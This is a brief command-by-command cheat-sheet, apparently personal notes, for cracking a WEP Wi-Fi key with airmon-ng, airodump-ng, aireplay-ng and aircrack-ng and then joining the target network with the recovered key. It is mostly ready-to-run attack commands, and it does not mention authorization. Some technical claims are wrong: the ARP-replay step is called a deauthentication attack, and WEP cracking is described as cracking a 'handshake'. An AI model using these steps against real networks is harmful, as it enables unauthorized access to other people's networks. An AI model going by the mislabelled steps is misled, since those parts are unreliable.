Attack WEP

Ref:

  1. Start monitor mode:

# start monitor mode
sudo airmon-ng start wlan0

# stop monitor mode (do this before connecting to the WiFi);
# airmon-ng names the monitor interface wlan0mon, as used below
sudo airmon-ng stop wlan0mon


# list nearby access points and show their WPS information
sudo airodump-ng wlan0mon --wps
  2. Start capturing the hash of the handshake:

# capture on the monitor interface created in step 1
sudo airodump-ng -c $AP_CHANNEL --bssid $AP_MAC -w capture_WEP wlan0mon

In parallel, run the deauthentication attack:

# -b takes the access point's MAC address (BSSID), -h the station's MAC address
sudo aireplay-ng -3 -b $AP_MAC -h $STATION_MAC wlan0mon
  3. Crack the handshake:

sudo aircrack-ng capture_WEP.cap


After cracking, you can connect to the WiFi network directly through the UI or with the terminal commands below.

Make sure to stop monitor mode before connecting:

sudo iwconfig wlan0 essid <target SSID Name> key <hexKey>

# refresh the DHCP Configuration
sudo dhclient wlan0

Stuck?

https://securitysynapse.blogspot.com/2013/12/wireless-pentesting-on-cheap-kali-tl.html

http://www.onnocenter.or.id/wiki/index.php/Attacks:_WEP_Cracking,_WPA_Handshake_Capture

https://www.youtube.com/watch?v=e667NA3aPqY
